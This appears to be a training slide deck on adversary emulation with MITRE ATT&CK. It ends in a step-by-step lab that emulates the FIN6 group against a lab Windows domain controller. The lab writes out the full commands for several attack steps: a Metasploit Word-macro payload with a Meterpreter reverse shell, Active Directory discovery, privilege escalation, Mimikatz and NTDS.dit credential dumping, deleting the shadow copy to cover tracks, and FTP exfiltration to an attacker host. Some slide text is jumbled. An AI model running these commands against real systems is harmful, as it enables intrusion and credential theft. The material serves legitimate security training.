Adversary emulation involves leveraging your Red Teams to use real world adversary tactics, techniques and procedures (TTPs), alongside attack frameworks such as MITRE ATT&CK to: Identify control gaps (and weaknesses); Validate your monitoring, detection and response capabilities; Prioritising your security investments towards mitigating any shortcoming that may be observed using this approach.
2. Introducing Adversary Emulation
Objectives:
- Identify common cybersecurity assessment problems
- Introduce adversary emulation concepts and methodology to
address cyber threats proactively
- Introduce MITRE ATT&CK as a framework to guide Adversary
Emulation exercises
- Describe a case study of on how to emulate APT Group
attacks
3. Lets ponder over some philosophical
questions: Genesis of the Adversary
Emulation discipline
4. Common Assessment Problems
Enterprises often want to understand their cybersecurity
effectiveness.
Common questions which arise are:
- Are the enterprise employees trained and alert?
- Are the internal processes to manage incidents effective?
- Are enterprise technologies properly configured and delivering value?
5. Common Assessment Problems (contd.)
Some of the common assessment techniques used in the industry
are:
- Threat Hunting
- Red Teaming
- Penetration Testing
- Vulnerability Assessment
These techniques focus primarily on initial access vectors without
diving much into the world of Post Exploitation TTPs.
They are important initiatives but are not representative of real-world
threats!
6. Common Assessment Problems (contd.)
Another significant problem observed with Red Team Exercises and
Penetration tests is that often, Red and Blue teams are
disincentivized from working together! It’s a Competition!
They are reluctant to share their TTPs and the failure of one is often
considered the success of the other!
While Purple Teaming is way to get these conflicting forces to work
together, this may not always be effective
7. Enter Adversary Emulation
Execute real-world adversary TTPs to assess and improve
cybersecurity!
MITRE ATT&CK: A Common Ontology (we
will return to this later)
8. How does Adversary Emulation help?
- Adversary emulation (not simulation) helps organizations assess
cybersecurity effectiveness against real-world threats, thereby
enabling impactful improvements
- Adversary emulation supports transparent disclosure of TTPs and
findings
- There's no need to withhold information because the TTPs are already in
use in the wild
- Because it's real-world, there is a greater sense of urgency to fix issues
- Leverages MITRE ATT&CK to communicate adversary behaviors in a
common language
9. MITRE ATT&CK
• MITRE ATT&CK is an adversary TTP emulation framework to
describe APT attack vectors aka Tactics, Techniques and
Procedures (TTPs)
• Tactics: Key adversary goal (e.g. Initial Access)
• Techniques: A technique to achieve the desired goal (e.g.
Spear Phishing)
• Sub-technique: A specific example of a Technique (Spear Phishing →
Spear Phishing via File Attachment
• Procedure: A tool or script designed to operationalize a specific
(Sub) Technique (e.g. Phishing Framework)
10. MITRE ATT&CK Usage
• Identify and understand APT attack TTPs
• Training tool for CTI analysts, defenders and red team
operators
• Attack campaign planning tool for Red Team Operations
(Consultants and Enterprise)
• Granular analysis of attacker TTPs across multiple APT
actors/groups
Examples coming up!
12. MITRE ATT&CK Navigator
Tooling the Matrix – RED Pill or BLUE
• Sorry had to bring in a reference to my favorite movie!
• Let's switch to something “Live”
25. Adversary Emulation Overview
Objectives:
- Explain the purpose of Adversary Emulation
- Describe Adversary Emulation characteristics
- List common Adversary Emulation use cases
26. What is Adversary Emulation?
• There is no standard definition to codify the discipline:
• Sometimes, it is referred to as Threat Emulation
• Sometimes, it is referred to as Simulation instead of Emulation
There’s no standard definition for adversary simulation, yet. It doesn’t even have an agreed
upon term. I’ve heard thread emulation, purple teaming, and attack simulation to discuss
roughly the same concept. I feel like several of us are wearing blindfolds, feeling around our
immediate vicinity, and we’re working to describe an elephant to each other.
- Raphael Mudge(Cobalt Strike)
27. Example Definitions
[Adversary Emulation] is a type of Red Team exercise where the Red Team emulates how an adversary operates,
following the same tactics, techniques, and procedures (TTPs), with a specific objective like those of realistic adversary.
- Jorge Orchilles, Scythe
Adversary Emulation and Red Team Exercises (Educause)
Emulating an adversary group means duplicating their behavior with precision and exactness…Simulating an
adversary group means becoming a composite of behaviors (TTPs) from one or more adversary groups,
potentially with new behaviors (TTPs) not previously used by that adversary group.
- Tim MalcomVetter, Cyderes
Emulation, Simulation, & False Flags
Adversary emulation is an impersonation, mimicking of someone or something else. Based on threat intelligence,
you determine APT28 is most likely to target your organization. To emulate this adversary, you mimic the TTPs
they use and test those in your environment. You behave exactly like they would.
- Jonas Bauters, NVISO Labs
What’s in a name? Thoughts on Red Team nomenclature
28. How would I define it?
• Emulation or Simulation?
• The terms threat/adversary emulation/simulation are frequently used interchangeably
• Some people impart precise meaning to the terms
• Personal preference is to use Adversary Emulation
Adversary Emulation is an intelligence driven discipline that entails
researching, modeling, and executing cyber adversary tactics, techniques,
and procedures (TTPs) to assess and improve cybersecurity.
30. Key Characteristics (contd.)
- Transparent
- Collaborative
- Repeatable
Secondary Characteristics
These characteristics support professional and impactful engagements
31. Adversary Emulation Use Cases
• Assessment and Improvement
• Exercise personnel
• Assess organizational processes
• Evaluate technology
• Capability Development
• Create/modify tools and analytics based on adversary TTPs
• Professional Development
• Improve knowledge of ATT&CK and adversary behaviors
33. Adversary Emulation Framework
• Iterative process to guide adversary
emulation activities
• Aligned with the organization's
cybersecurity goals
• CTI driven
• Methodical
• Not a rigid process
• It is common to revisit previous steps
35. Define The Objective
• Work with the network owners to
help define their adversary
emulation objectives
• What cybersecurity problem is
being addressed and why?
36. Research Adversary TTPs
• Research CTI to inform which TTs you
will emulate
• What cyber adversaries are of salient interest
to the organization?
• What are their TTPs?
• ATT&CK is used extensively
• Common language for describing adversary
TTPs
• Summarized adversary descriptions
• CTI sources
37. Plan The Activity
• Professional Adversary Emulation
requires planning
• Scope
• Schedule
• Rules of Engagement
• Written Approval
• Communications Plan
38. Implement TTPs
• Implement TTPs into a usable format
• Striving for realism
• Balancing project constraints
• Consolidate TTPs into the Adversary
Emulation Plan
• Collection of resources used to execute
adversary TTs
39. Conduct the Activity
• Execute the Adversary Emulation Plan
• Execute Each TTP
• Was it detected/prevented?
• Communicate and document activities
and findings
40. Conclude the Activity
• Concluding the activity typically
entails:
• Providing reports, presentations
• Providing recommendations, mitigations
• Supporting improvements
• Lessons learned
41. Defining Engagement Objectives
Objectives:
- Explain why defining engagement objectives is necessary
- Discuss the purpose of engagement objectives
- Ask questions to help network owners define engagement
objectives
42. Defining Engagement Objectives
• Many questions are raised when we begin planning adversary
emulation activities:
• What adversary will we emulate?
• What TTPs will we implement?
• How will we execute these TTPs?
• These answers should be driven by the engagement
objectives
• Ensures our adversary emulation activities are aligned with the
organization's security goals.
43. Defining Engagement Objectives (contd.)
• Engagement objectives define our goal:
• "What are we trying to achieve with adversary emulation, and why?“
• Common examples from network owners:
• We would like to emulate APT 29 TTPs to exercise our SOC staff
• We would like to emulate adversary TTPs to evaluate our ED solution
• We would like to emulate adversary TTPs because... ???
• Network owners commonly need guidance to define good
adversary emulation engagement objectives
44. Questions to ask Network Owners
• Ask questions to help network owners articulate their goals and
priorities:
• Why are you seeking an adversary emulation engagement?
• What cyber threats are you concerned about?
• What ATT&CK TTPs can you detect?
• Be cognizant of the organization's goals and security maturity
• Adversary emulation may not be appropriate for all use cases
• They may not be ready for adversary emulation if they don't have
foundational security practices in place
45. Introducing the Adversary Emulation Plan
Objectives:
- Explain the purpose of the adversary emulation plan
- List components that make up an adversary emulation plan
- Gain familiarity with the Center for Threat Informed Defense
(CTID)Adversary Emulation Library.
46. Adversary Emulation Plan Overview
What is an Adversary Emulation Plan?
- Collection of resources that enables
operators to emulate adversary
TTPs
- Provides step-by-step execution
instructions
- Incudes supporting resources
(binaries, scripts, diagrams,
ATT&CK navigator layers, etc.)
47. Adversary Emulation Plan Components
• Adversary emulation plan components commonly include:
• Adversary overview - objectives, targets, and tools
• CTI - intelligence summary and sources
• Diagrams - ATT&CK Navigator layers, operations flow diagrams
• Written Procedures - setup and execution instructions
• Resources - tools, binaries, scripts needed for execution
• Mitigations - observables, artifacts, signatures, rules, etc
56. Step 1: Access the library
• Your first task is to access the CTID Adversary Emulation Library.
• Open a web browser and navigate to the library using the following URL:
https://github.com/center-for-threat-informed-defense/adversary_emulation_library
57. Step 2: Explore the project README
• We’ll now develop an understanding of the CTID Adversary Emulation Library project’s
philosophy and general structure. Click the project README file and take a few
minutes to read through its contents. (Note: README is a simple text file in markdown
format. README files are commonly used to provide basic documentation about a
project, such as its purpose, installation and usage instructions, license information,
etc.)
58. Step 2: Explore the project README (contd.)
• The project README lists several adversary emulation plans available for your use.
Are any of these threat actors relevant to your organization?
59. Step 3: Understand the FIN6 Emulation
Plan Components
• We’re going to explore the FIN6 adversary emulation plan so you can study its
components and content. The purpose of this exercise is to prime your understanding
as we will execute the FIN6 emulation plan in an upcoming lab. Navigate to the FIN6
emulation plan directory and you should be greeted with the following:
60. Step 3: Understand the FIN6 Emulation
Plan Components (contd.)
• Take a moment to read through the FIN6 README. Note that the README provides a
link to a video that demonstrates the CTID Emulation Library in action by its original
authors; this video is highly recommended to supplement your learning. Also observe
the emulation plan components, which can be seen in the FIN6 table of contents (see
image below)
61. Step 4: Explore the FIN6 Intelligence Summary
• The CTID Adversary Emulation Library provides cyber threat intelligence summaries for each of its
emulation plans. The intelligence summaries describe the emulated actor’s objectives, targets, and
observed TTPs based on publicly available reporting. Navigate to the FIN6 intelligence summary
from the FIN6 table of contents (see image below).
62. Step 4: Explore the FIN6 Intelligence Summary
(contd.)
• After clicking the link, you should be on a page that resembles the following
screenshot.
• Read through FIN6 intelligence summary; try to understand FIN6’s objectives,
target industries, and general TTPs.
63. Step 5: Explore the FIN6 Operations Flow
• The Operations Flow page describes how the emulated actor works towards achieving
their objectives. The operations flow helps visualize how to logically chain together
major steps the emulated actor commonly performs during an operation. Navigate to
the FIN6 Operations Flow from the FIN6 table of contents (see image below).
64. Step 5: Explore the FIN6 Operations Flow (contd.)
• After clicking the link to the Operations Flow, you should see a page resembling the following
screenshot.
65. Step 6: Explore the FIN6 Adversary
Emulation Scenarios
• Now that you are familiar with the FIN6 intelligence summary and operations flow, we are
going to explore the FIN6 adversary emulation scenarios. The adversary emulation
scenarios provide step-by-step instructions for executing the emulated actor’s TTPs, and
also provide guidance on how to setup any required tools and/or infrastructure. Let’s look
at these scenarios in detail. Navigate to the FIN6 Emulation Plan folder from the root of the
FIN6 folder by clicking the “Emulation Plan” directory in the GitHub file browser (see image
below).
66. Step 6: Explore the FIN6 Adversary
Emulation Scenarios (contd.)
• From the FIN6 Emulation Plan Folder, you should see a page that resembles the
following screenshot.
67. Step 6: Explore the FIN6 Adversary
Emulation Scenarios (contd.)
• Start by reviewing the contents of Infrastructure.md
• This document provides guidance on tools and infrastructure needed to
complete the adversary emulation scenario.
• Next, skim through the Phase1.md file
• Do you see any TTPs you haven’t seen before?
• Review the machine-readable YAML file, FIN6.yaml
• This file is designed to be ingested by an automated adversary
emulation framework such as CALDERA. In a future module, we will
demonstrate how to execute adversary emulation scenarios
automatically.
69. Requirements
• Internet Access
• Elevated privileges to install hypervisor software, such as
VirtualBox
• This lab requires sufficient resources to run Kali Linux and
Windows Server 2019 virtual machines concurrently. The
following minimum hardware specifications are recommended:
• 8 GB RAM
• 75 GB free disk space
• 4 core 2 GHz CPU
70. MALWARE WARNING!
Fundamentally, this lab entails executing publicly
known adversary TTPs so that we can assess and
improve cybersecurity. As a result, many of the tools
and resources will likely be flagged malicious by
security products.
As a precaution, you should not perform these labs on
any system that contains sensitive data. Additionally,
you should never use capabilities and/or techniques
taught in this course without first obtaining explicit
written permission from the system/network owner(s).
71. Step 1: Download and Install a Hypervisor
• A hypervisor is software that can create and run
Virtual Machines. Virtual machines enable you to
run guest operating systems on your host
computer. We will use a hypervisor in order to run
virtual machines running Kali Linux and Windows
Server 2019
• Download and install the hypervisor of your
choice; This talk will utilize VirtualBox, as it is
freely available and supported on most operating
systems (Windows, Mac, and Linux)
72. Step 1: Download and Install a Hypervisor(contd)
• Install the
necessary version
according to your
platform.
• As a bonus, also
download the
extension pack.
73. Step 1: Download and Install a Hypervisor(contd)
• Follow the onscreen steps to install VirtualBox
74. Step 2: Install Kali Linux and Windows Server
• Go To https://www.kali.org/get-kali/#kali-virtual-machines
• Choose the appropriate image according to your hypervisor
and download it (in our case, it is VirtualBox)
• Double click on the image and hit OK to install Kali Linux
• Go To https://www.microsoft.com/en-us/evalcenter/evaluate-
windows-server-2019
• Download the Windows Server 2019 ISO
• Install the ISO in your hypervisor
75. [ Optional ] Steps
• Install the
extension
packs
• Install Guest
Additions
• Take a
snapshot of the
machine states
76. Step 3: Configuring the VMs
• Go to https://github.com/maddev-engenuity/AdversaryEmulation
• Download/Clone the repository on each of the Virtual Machines
• Navigate to the directory containing the repository head
$ cd vm_setup_scripts/kali
$ sudo ./setup-kali-vm.sh
• On Windows, open an
Administrative Powershell
session and run the following
commands:
• On Kali, type the following
command:
cd .vm_setup_scriptswindows_server
.setup-dc.ps1
77. Step 3: Configuring the VMs (contd.)
• When the setup processes are complete, the following accounts
would be created on the respective VMs:
• On Kali, a user will be created with the following credentials:
• Username: attacker
• Password: ATT&CK
• On Windows Server 2019, a new user would be created with the
following account credentials:
• Username: MADmadAdmin
• Password: ATT&CK
79. Step 1: Access the Emulation Plan
• Our first task is to access the
CTID FIN6 Adversary Emulation
Plan. We will be executing
Phase 1 of the emulation.
Navigate to the library using the
following URL:
https://github.com/center-for-threat-informed-
defense/adversary_emulation_library/blob/master/fin6/E
mulation_Plan/Phase1.md
80. Step 1: Access the Emulation Plan (contd.)
Examining this plan, we see that there are 4 steps:
• Initial Access
• Discovery
• Privilege Escalation, and
• Collection and Exfiltration
However, Initial Access does not have specific procedures provided. We’ll fill
in this blank with our own procedure based on Cyber Threat Intelligence (CTI).
81. Step 2: Create Initial Access Payload
The CTID Emulation Plan begins with an adversary performing discovery techniques
on the target system.
For this to be possible, the adversary first needs to gain access to the target system.
Looking at the ATT&CK page for FIN6, we see that they have used the Phishing:
Spear Phishing Attachment technique (T1566.001) to gain initial access.
We’ll perform that technique using Metasploit’s Office Word Macro exploit, which we
create on the Kali attacker VM.
First, in a terminal window, as the attacker user, navigate to the proper directory by
typing:
cd AdversaryEmulation/labs/lab_1.3
82. Step 2: Create Initial Access Payload (contd.)
Then start msfconsole as sudo by typing:
sudo msfconsole -q
Select the Office Word Macro exploit using the following command:
use exploit/multi/fileformat/office_word_macro
83. Step 2: Create Initial Access Payload (contd.)
As seen in the screenshot, Metasploit automatically configures the exploit to use the staged
Windows Meterpreter TCP reverse shell. This is the x86 version of Meterpreter. In order to
dump credentials with Mimikatz later in this lab, we need to use the x64 version. To do so, run
the following command:
set payload windows/x64/meterpreter/reverse_tcp
We now need to configure the payload and exploit
appropriately so the Meterpreter shell can
connect back to our machine. Let’s list the various
options for the payload and exploit using:
show options
84. Step 2: Create Initial Access Payload (contd.)
We will use the default template provided with the exploit, so we don’t need to change the
CUSTOMTEMPLATE or FILENAME Module options. We can also leave the EXITFUNC and
LPORT Payload options alone. We don’t need to change LPORT either, but we will take note of
it. We will need to change the LHOST option though so the Meterpreter shell knows which
host to connect to. To do that, we first need to find our attackerVM host’s IP address. We can
list it using the command:
ip a
85. Step 2: Create Initial Access Payload (contd.)
Replace [attacker VM_ip_address]
with your attacker VM IP address in
the command above. Listing the
options again shows that the IP
address was successfully set.
set LHOST [attackerVM_ip_address]
Note: Your IP address may be different from the one shown in the image above. With this
knowledge, we can set the LHOST option with the following command. Make sure to replace
the placeholder with your host’s IP address:
86. Step 2: Create Initial Access Payload (contd.)
exploit
With our options set, all we need to do to
create the malicious Word document is to
run the exploit with the command:
Lastly, we’ll copy the document to our current lab_1.3 folder with the following command:
cp /root/.msf4/local/msf.docm .
The payload is now ready for delivery
87. Step 3: Set up Payload Handler
use exploit/multi/handler
With our payload ready, we need a handler to
accept the connection back from our target.
We use msfconsole to set up this handler as
well.
First, select the exploit handler module by
typing:
Now, we need to inform the handler of the payload we are waiting for, which was:
windows/x64/meterpreter/reverse_tcp
set payload windows/x64/meterpreter/reverse_tcp
Looking at the options, we see that LHOST needs to be set along with EXITFUNC to match our
original payload’s option. We don’t need to set LPORT because it matches the options we set
for the Word document payload.
88. Step 3: Set up Payload Handler (contd.)
As before, we set the LHOST option with the
attackerVM's IP address: set payload windows/x64/meterpreter/reverse_tcp
We also set the EXITFUNC option to be
thread:
set EXITFUNC thread
89. Step 3: Set up Payload Handler (contd.)
Lastly, we start the handler with the command: run
When the Meterpreter reverse shell
connects back to the attackerVM, the
handler will accept the connection and
begin an interactive session with the
target.
90. Step 4: Serve Payload
The Phishing: Spearphishing Attachment technique (T1566.001) specifies that the malicious
payload is sent as an attachment in an email. However, for sake of simplicity, we will be simply
sending the file to the target via an HTTP download.
cd /home/attacker/AdversaryEmulation/labs/labs1.3
First, we need to set up an HTTP server to serve
the malicious Word document. Open a new
terminal tab with Ctrl+Shift+t, and then navigate
to the lab 1.3 directory by typing:
Then, start a Python3 HTTP server on
port 80 by typing:
cd /home/attacker/AdversaryEmulation/labs/labs1.3
91. Step 5: Download and Execute Payload
Switch to the Windows host (targetDC). Use the following credentials to log in:
• username: MADmadAdmin
• password: ATT&CK
Open PowerShell, and paste or type the following PowerShell command to download the payload
to the Desktop. Make sure to replace the IP address placeholder with the IP address of the
attackerVM:
Invoke-WebRequest -Uri http://[attackerVM_IP_address]/msf.docm -OutFile C:UsersmadAdminDesktopmsf.docm
92. Step 5: Download and Execute Payload(contd.)
You can now close the PowerShell window, as the
payload has been delivered to the target. Parts of this
emulation plan require elevated access.
Normally, Microsoft Word is run in a low privilege
context, which means the reverse shell that the
adversary receives also is in a low privilege context.
The adversary would then need to elevate their
privileges somehow, such as by using a UAC Bypass
exploit.
To simplify the process here, and not stray too far from
the existing emulation plan, we’ll start Word in an
elevated context, so that the reverse shell we receive is
also in an elevated context to begin with. Click on the
search box in the Windows taskbar and type in ‘Word’.
Right-click on the Microsoft Word result, select ‘Run as
Administrator’, and then click Yes on the resulting
UAC prompt. This will start Word in an elevated context.
93. Step 5: Download and Execute Payload(contd.)
Click through any spurious popups that are
opened by Word.
From here, open ‘msf.docm’ that we
downloaded to the Desktop.
Then, click on the Enable Macros prompt
shown in the image below to allow the payload
to execute.
94. Step 5: Download and Execute Payload(contd.)
Switch back to the msfconsole terminal window on the attackerVM. You should see that the handler received a
callback from the (Windows) targetDC, with a new meterpreter session created.
Type:
We see that we are the MADmadAdmin user.
getuid
Take note of the IP address the connection was received from – this is the (Windows) targetDC’s IP address. In
this case, it is 192.168.57.104.
95. Step 6: Account Discovery: Domain Account
Now that we have a Meterpreter session on the targetDC, we can begin following the techniques listed in the
FIN6 Emulation Plan. Most of the techniques presented in the Emulation Plan are provided with a FIN6
procedure and an Alternative procedure. In an actual Emulation exercise, you would most likely only execute
one procedure for the technique. However, as this is a learning exercise, we will perform both the FIN6 and
Alternative procedures where possible.
Most of the specific procedures presented from this point onwards are taken directly from the CTID FIN6
Emulation Plan with minimal variation, mostly in the form of differentiating output filenames between the FIN6
and Alternative procedures. Additional instruction to facilitate execution of those procedures is provided in this
walkthrough as well.
FIN6 starts with some discovery commands on the domain, using a 3rd party tool called AdFind. AdFind has
been prepositioned on the targetDC for sake of simplicity. In testing, AdFind was found to not work well with the
default Command Prompt shell available in Meterpreter. So, in this lab, we use a PowerShell session instead.
The procedures are also modified accordingly to work in PowerShell. Let’s drop down into a PowerShell
session by running the following commands:
load powershell
powershell_shell
96. Step 6: Account Discovery: Domain
Account (contd.)
The discovery procedures write the results of the discovery
commands to files. To keep everything tidy, first navigate to
the Public user’s home directory, which is where we’ll write
the output files:
cd C:UsersPublic
The first discovery technique in the plan is Account
Discovery: Domain Account (T1087.002). The primary
procedure for this technique as provided in the emulation
plan is:
adfind.exe -f "objectcategory=person" > ad_users.txt
After running the command, we can view the contents of the
output file with the type command: type ad_users.txt
98. Step 6: Account Discovery: Domain
Account (contd.)
The alternate procedure uses the net user utility. We modify
the command from the FIN6 emulation plan by changing the
name of the output file:
net user /domain > ad_users_net.txt
99. Step 7: Remote System Discovery
Following the discovery of the users
on the domain, FIN6 performs
Remote System Discovery (T1018) to
identify computer objects on the
domain.
The FIN6 procedure is:
adfind.exe -f "objectcategory=computer" > ad_computers.txt
100. Step 7: Remote System Discovery (contd.)
The Alternative procedure is:
net group "Domain Computers" /domain > ad_computers_net.txt
101. Step 8: Domain Trust Discovery
First, FIN6 enumerates all
Organizational Units in the current
user’s domain:
adfind.exe -f "objectcategory=organizationalUnit" >
ad_ous.txt
With information on domain users and computers obtained, FIN6 performs
Domain Trust Discovery (T1482) using 2 separate procedures.
102. Step 8: Domain Trust Discovery (contd.)
Get-ADOrganizationalUnit -Filter 'Name -like "*"' | Format-Table Name, DistinguishedName -A > ad_ous_ps.txt
Alternative procedure:
Next, FIN6 performs a full forest search for trust objects using AdFind’s trustdmp
feature. As there are no other domains within the Active Directory forest for this
environment, this command will return no results, but we perform it anyway to complete
the emulation:
adfind.exe -gcb -sc trustdmp > ad_trustdmp.txt
104. Step 9: System Network Configuration Discovery
FIN6 procedure: adfind.exe -subnets -f "objectcategory=subnet" > ad_subnets.txt
FIN6 then performs System Network Configuration Discovery (T1016) to list
subnets within the network. As the target network consists of just 1 host, there will
not be much information returned from this procedure, but we still perform it as a
learning activity.
105. Step 9: System Network Configuration
Discovery (contd.)
Get-ADReplicationSubnet -Filter * > ad_subnets_ps.txt
Alternative procedure:
Again, as there are no subnets in our test domain, there is no output from this command.
106. Step 10: Permission Groups Discovery: Domain Groups
FIN6 procedure:
adfind.exe -f "objectcategory=group" > ad_group.txt
The last discovery technique that FIN6
performs in this emulation plan is
Permission Groups Discovery: Domain
Groups (T1069.002). FIN6 uses
AdFind to list groups in the domain and
writes the output to a file.
107. Step 10: Permission Groups Discovery: Domain Groups
(contd.)
Alternative procedure:
net group /domain > ad_group_net.txt
108. Step 11: Access Token Manipulation
Having completed their discovery objectives, FIN6 begins working towards gaining privilege escalation on the
domain, beginning with Access Token Manipulation (T1134). The procedure in the emulation plan uses
Meterpreter’s getsystem command, which can escalate privileges in several different ways. In this scenario,
we specify the use of the named-pipe impersonation method. Further information can be found in the
documentation for Meterpreter.
To perform the FIN6 procedure, we first need to exit the
PowerShell shell within our Meterpreter session, to bring us
back to the meterpreter> prompt.
Ctrl+C
y
FIN6 procedure:
getsystem -t 1
109. Step 11: Access Token Manipulation
Having completed their discovery objectives, FIN6 begins working towards gaining privilege escalation on the
domain, beginning with Access Token Manipulation (T1134). The procedure in the emulation plan uses
Meterpreter’s getsystem command, which can escalate privileges in several different ways. In this scenario,
we specify the use of the named-pipe impersonation method. Further information can be found in the
documentation for Meterpreter.
To perform the FIN6 procedure, we first need to exit the
PowerShell shell within our Meterpreter session, to bring us
back to the meterpreter> prompt.
Ctrl+C
y
FIN6 procedure:
getsystem -t 1
110. Step 11: Access Token Manipulation (contd.)
Running getuid again, we see that we are now the NT SYSTEMAUTHORITY user, which means we now have
additional privileges on the targetDC.
The alternative procedure uses the PowerSploit PowerShell module, which contains a PowerShell function
called Get-System, to also elevate privileges using the same named-pipe impersonation method. However,
executing it crashes the Meterpreter shell. As a result, we leave it out of this lab walkthrough
111. Step 12: OS Credential Dumping
After gaining elevated access to a target system, FIN6 has been found to dump credentials. The FIN6
Emulation Plan lists three separate procedures through which FIN6 has been reported to dump credentials.
The first procedure performs OS Credential Dumping: LSASS Memory (T1003.001) using Meterpreter’s
Mimikatz module. Run the following commands from the meterpreter> prompt to load the Mimikatz module
into the Meterpreter session and then retrieve wdigest credentials:
load kiwi
creds_all
112. Step 12: OS Credential Dumping (contd.)
The second procedure performs OS Credential Dumping: NTDS (T1003.003) by using Metasploit’s psexec_ntdsgrab
module to download copies of the NTDS.dit file and the System registry hive. NTDS.dit is a database file containing
Active Directory data, including usernames and hashed passwords. The SYSTEM registry hive and SYSTEM
configuration file contain information that can be used to crack the passwords stored in NTDS.dit.
The Metasploit module can have issues in execution, especially as Windows changes over time. Instead, we’ll perform
the attack manually, which also gives us the opportunity to better understand the attack.
If you recall from the last step, we escalated our user context to the NT SYSTEMAUTHORITY user, which is the user
account with the most permissive access on the system. However, parts of this procedure require that they be run as a
regular user in an elevated context to properly work. We can get back to our elevated madAdmin user context by
migrating to a process that is running in that particular context.
Process migration is a fairly complicated process. Meterpreter makes this very simple and transparent to us though.
We’ll migrate back to the Word process, as we launched it as an Administrator, using the following command:
migrate -N WINWORD.EXE
getuid
113. Step 12: OS Credential Dumping (contd.)
The first thing we do is create a Volume Shadow Copy of the C:
drive. A Volume Shadow Copy is a snapshot of a set of files, which
can be accessed to copy files even when the originals are currently
being used by Windows. We do this using the Volume Shadow Copy
Service:
shell
We see that we are back to the MADmadAdmin user. From here,
we can proceed with the credential access procedure. From the
meterpreter> prompt, drop into a Command Prompt shell:
vssadmin create shadow /for=C:
114. Step 12: OS Credential Dumping (contd.)
We also copy the SYSTEM registry hive and SYSTEM
configuration file to the same directory, again with the
same prefix as before. As before, replace the
placeholder with the Shadow Copy Name we noted.
copy <shadow_copy_name>windowsntdsntds.dit
C:UsersPublicad_ntds.dit
Now, copy the NTDS.dit file from the Shadow Copy to
the C:UsersPublic directory, with a prefix for easy
identification. Make sure to replace the placeholder with
the value we just noted.
Take note of the Shadow Copy ID and Shadow Copy Name as we’ll need them for the next commands.
reg SAVE HKLMSYSTEM C:UsersPublicad_SYS_reg
copy <shadow_copy_name>windowssystem32configSYSTEM
C:UsersPublicad_SYSTEM_cfg
115. Step 12: OS Credential Dumping (contd.)
vssadmin delete shadows /shadow=<volume_shadow_id> /Quiet
We’ll extract these files in a later step. For now, we’ll
delete the Shadow Volume Copy we created to erase
some of our tracks. Replace the placeholder value in the
command below with the Volume Copy ID noted earlier.
116. Step 13: Archive Collected Data: Archive via Utility
cd C:UsersPublic
7.exe a -mx3 ad.7z ad_*
After completing their discovery and
collection activities, FIN6 archives all
their collected data using a renamed
command-line version of 7-Zip in
preparation for exfiltration (T1560.001).
117. Step 14: Exfiltration Over Web Service
The last task in the CTID FIN6 Emulation Plan is to exfiltrate the collected data. At the time of
creating this lab, the Emulation Plan called for the use of Plink.exe to perform the exfiltration;
however, the plan did not clarify how to perform the file transfer. Instead of simply using the
provided Alternative Procedure, we can use this as an exercise to examine existing Cyber Threat
Intelligence to determine a procedure that allows for a more faithful emulation.
The IBM X-Force Exchange report found
here indicates that FIN6 has used FTP to
exfiltrate data to their systems.
118. Step 14: Exfiltration Over Web Service (contd.)
With this knowledge, we can proceed with exfiltration, but this time using FTP.
The first thing we need to do is to set up an FTP
server on the attackerVM host. Go back to the
terminal tab that was used to run the Python3 HTTP
Server. Terminate the server by typing:
Ctrl + C
We will now use a Python3 FTP module to run an FTP
server on the attackerVM:
sudo python3 -m pyftpdlib -w -p21 -d
/home/attacker/AdversaryEmulation/labs/lab_1.3 -u ftpuser -P ftppass
119. Step 14: Exfiltration Over Web Service (contd.)
echo open {attackerVM_ip_address}> ftp.txt
echo ftpuser>> ftp.txt
echo ftppass>> ftp.txt
echo put ad.7z>> ftp.txt
echo bye>> ftp.txt
With the FTP server set up, we can go back to our Meterpreter tab to upload the archive file using
FTP. One thing to note is that the Windows FTP client is interactive. Due to the nature of the
Meterpreter reverse shell, we are not able to interact with an interactive prompt. Instead, we need to
write all the FTP commands we wish to run to a file, and then run the FTP client in non- interactive
mode by passing it the file we just wrote. To write the file from a non-interactive prompt, run the
following commands, replacing the IP placeholder with the appropriate value:
120. Step 14: Exfiltration Over Web Service (contd.)
ftp –s:ftp.txt
Finally, we can run the FTP client by
passing in our text file with commands:
Let’s go back to the FTP terminal tab and terminate the
server with Ctrl+C as we no longer need it. Listing the
contents of our lab folder, we can see that the file we
uploaded is now present on the attackerVM.
That brings us to the end of the emulation plan and the lab. Congratulations, you’ve successfully
performed an Adversary Emulation Exercise!